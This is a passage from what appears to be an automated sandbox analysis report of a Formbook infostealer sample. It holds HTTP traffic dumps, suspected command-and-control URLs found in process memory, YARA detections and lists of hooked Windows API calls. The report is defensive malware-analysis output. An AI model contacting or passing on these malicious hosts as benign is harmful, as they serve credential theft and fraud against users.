44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:53:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:53:33 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:53:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 16:54:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33Set-Cookie: slv_session_a09c0148b9fdb1e1201753b66346053d=533f06efaad74dc03aa6e60a6ce0ee3f%7C%7C1720198457%7C%7C1720194857%7C%7Ce58761108355481112a576e70ea7b708; expires=Fri, 02-Aug-2024 16:54:17 GMT; Max-Age=2592000; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidateSet-Cookie: PHPSESSID=72q7vrf1ctov17qs3optb9pvr5; path=/Pragma: no-cacheLink: <https://primefindsstore.shop/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 16:54:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33Set-Cookie: slv_session_a09c0148b9fdb1e1201753b66346053d=70ed71b81025c39171072e3b0ce9172f%7C%7C1720198460%7C%7C1720194860%7C%7C9ca75b6a083e51ae3fd835288ebd32b3; expires=Fri, 02-Aug-2024 16:54:20 GMT; Max-Age=2592000; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidateSet-Cookie: PHPSESSID=63p917bqijodufemh90e3p5q8d; path=/Pragma: no-cacheLink: <https://primefindsstore.shop/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 16:54:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33Set-Cookie: slv_session_a09c0148b9fdb1e1201753b66346053d=756559287fe03a4415a77fd29eb7083c%7C%7C1720198462%7C%7C1720194862%7C%7C3fd2ead987855aa39d85578e2a4e75dd; expires=Fri, 02-Aug-2024 16:54:22 GMT; Max-Age=2592000; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidateSet-Cookie: PHPSESSID=srdaoiq9gdvc81bcuceegectf2; path=/Pragma: no-cacheLink: <https://primefindsstore.shop/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzip
            Source: sc.exe, 0000000D.00000002.3946994371.0000000004278000.00000004.10000000.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3946036134.0000000003AA8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://bqtt8ppp.com:301
            Source: sc.exe, 0000000D.00000002.3946994371.0000000004BE4000.00000004.10000000.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3946036134.0000000004414000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://primefindsstore.shop/hfkt/?3pSl=bXiTJHhxyN&Z6ZTG=DjhV5ZtyptNtrRVL14
            Source: Amcache.hve.9.drString found in binary or memory: http://upx.sf.net
            Source: NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3948817261.0000000005854000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bayviewcribbage.com
            Source: NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3948817261.0000000005854000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bayviewcribbage.com/odz6/
            Source: sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: sc.exe, 0000000D.00000002.3942849584.0000000002F39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: sc.exe, 0000000D.00000002.3942849584.0000000002F39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: sc.exe, 0000000D.00000003.2503494724.0000000007EDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: sc.exe, 0000000D.00000002.3942849584.0000000002F39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: sc.exe, 0000000D.00000002.3942849584.0000000002F39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: sc.exe, 0000000D.00000002.3942849584.0000000002F39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: sc.exe, 0000000D.00000002.3942849584.0000000002F39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: sc.exe, 0000000D.00000002.3946994371.000000000509A000.00000004.10000000.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3946036134.00000000048CA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bayviewcribbage.com/odz6/?Z6ZTG=g2MxG/W7xhmOYso67RKSNHAiz8R/MmCgHQBJyh6P0RXX/Tr
            Source: sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: sc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de
            Source: sc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de/
            Source: sc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de/email_website/homepage-baukasten/
            Source: sc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de/login/
            Source: sc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de/neue-top-level-domain/
            Source: sc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de/unternehmen/datenschutz/
            Source: sc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de/unternehmen/kontakt/

            E-Banking Fraud

            Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.3944875828.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2322232096.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3948817261.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3945190684.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3945837611.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2322275427.00000000040C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe.1df0bbf5348.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
            Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe.1df0bbf5348.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
            Source: 0000000D.00000002.3944875828.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2322232096.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.3948817261.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.3945190684.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3945837611.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2322275427.00000000040C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0042B163 NtClose,6_2_0042B163
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033135C0 NtCreateMutant,LdrInitializeThunk,6_2_033135C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312B60 NtClose,LdrInitializeThunk,6_2_03312B60
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03312DF0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03312C70
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03314340 NtSetContextThread,6_2_03314340
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03313010 NtOpenDirectoryObject,6_2_03313010
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03313090 NtSetValueKey,6_2_03313090
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03314650 NtSuspendThread,6_2_03314650
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312BA0 NtEnumerateValueKey,6_2_03312BA0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312B80 NtQueryInformationFile,6_2_03312B80
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312BF0 NtAllocateVirtualMemory,6_2_03312BF0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312BE0 NtQueryValueKey,6_2_03312BE0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312AB0 NtWaitForSingleObject,6_2_03312AB0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312AF0 NtWriteFile,6_2_03312AF0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312AD0 NtReadFile,6_2_03312AD0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033139B0 NtGetContextThread,6_2_033139B0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312F30 NtCreateSection,6_2_03312F30
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312F60 NtCreateProcessEx,6_2_03312F60
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312FB0 NtResumeThread,6_2_03312FB0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312FA0 NtQuerySection,6_2_03312FA0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312F90 NtProtectVirtualMemory,6_2_03312F90
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312FE0 NtCreateFile,6_2_03312FE0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312E30 NtWriteVirtualMemory,6_2_03312E30
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312EA0 NtAdjustPrivilegesToken,6_2_03312EA0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312E80 NtReadVirtualMemory,6_2_03312E80
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312EE0 NtQueueApcThread,6_2_03312EE0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312D30 NtUnmapViewOfSection,6_2_03312D30
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312D10 NtMapViewOfSection,6_2_03312D10
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03313D10 NtOpenProcessToken,6_2_03313D10
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312D00 NtSetInformationFile,6_2_03312D00
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03313D70 NtOpenThread,6_2_03313D70
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312DB0 NtEnumerateKey,6_2_03312DB0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312DD0 NtDelayExecution,6_2_03312DD0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312C00 NtQueryInformationProcess,6_2_03312C00
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312C60 NtCreateKey,6_2_03312C60
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312CA0 NtQueryInformationToken,6_2_03312CA0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312CF0 NtOpenProcess,6_2_03312CF0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312CC0 NtQueryVirtualMemory,6_2_03312CC0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B4340 NtSetContextThread,LdrInitializeThunk,13_2_035B4340
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B3090 NtSetValueKey,LdrInitializeThunk,13_2_035B3090
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B4650 NtSuspendThread,LdrInitializeThunk,13_2_035B4650
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B35C0 NtCreateMutant,LdrInitializeThunk,13_2_035B35C0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2B60 NtClose,LdrInitializeThunk,13_2_035B2B60
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_035B2BF0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2BE0 NtQueryValueKey,LdrInitializeThunk,13_2_035B2BE0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2BA0 NtEnumerateValueKey,LdrInitializeThunk,13_2_035B2BA0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2AD0 NtReadFile,LdrInitializeThunk,13_2_035B2AD0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2AF0 NtWriteFile,LdrInitializeThunk,13_2_035B2AF0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B39B0 NtGetContextThread,LdrInitializeThunk,13_2_035B39B0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2F30 NtCreateSection,LdrInitializeThunk,13_2_035B2F30
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2FE0 NtCreateFile,LdrInitializeThunk,13_2_035B2FE0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2FB0 NtResumeThread,LdrInitializeThunk,13_2_035B2FB0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2EE0 NtQueueApcThread,LdrInitializeThunk,13_2_035B2EE0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2E80 NtReadVirtualMemory,LdrInitializeThunk,13_2_035B2E80
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2D10 NtMapViewOfSection,LdrInitializeThunk,13_2_035B2D10
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2D30 NtUnmapViewOfSection,LdrInitializeThunk,13_2_035B2D30
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2DD0 NtDelayExecution,LdrInitializeThunk,13_2_035B2DD0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2DF0 NtQuerySystemInformation,LdrInitializeThunk,13_2_035B2DF0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2C70 NtFreeVirtualMemory,LdrInitializeThunk,13_2_035B2C70
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2C60 NtCreateKey,LdrInitializeThunk,13_2_035B2C60
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2CA0 NtQueryInformationToken,LdrInitializeThunk,13_2_035B2CA0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B3010 NtOpenDirectoryObject,13_2_035B3010
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2B80 NtQueryInformationFile,13_2_035B2B80
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2AB0 NtWaitForSingleObject,13_2_035B2AB0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2F60 NtCreateProcessEx,13_2_035B2F60
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2F90 NtProtectVirtualMemory,13_2_035B2F90
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2FA0 NtQuerySection,13_2_035B2FA0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2E30 NtWriteVirtualMemory,13_2_035B2E30
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2EA0 NtAdjustPrivilegesToken,13_2_035B2EA0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B3D70 NtOpenThread,13_2_035B3D70
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B3D10 NtOpenProcessToken,13_2_035B3D10
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2D00 NtSetInformationFile,13_2_035B2D00
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2DB0 NtEnumerateKey,13_2_035B2DB0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2C00 NtQueryInformationProcess,13_2_035B2C00
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2CC0 NtQueryVirtualMemory,13_2_035B2CC0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B2CF0 NtOpenProcess,13_2_035B2CF0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E27B70 NtCreateFile,13_2_02E27B70
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E27E40 NtClose,13_2_02E27E40
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E27F90 NtAllocateVirtualMemory,13_2_02E27F90
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E27CD0 NtReadFile,13_2_02E27CD0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E27DB0 NtDeleteFile,13_2_02E27DB0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD34681CC00_2_00007FFD34681CC0
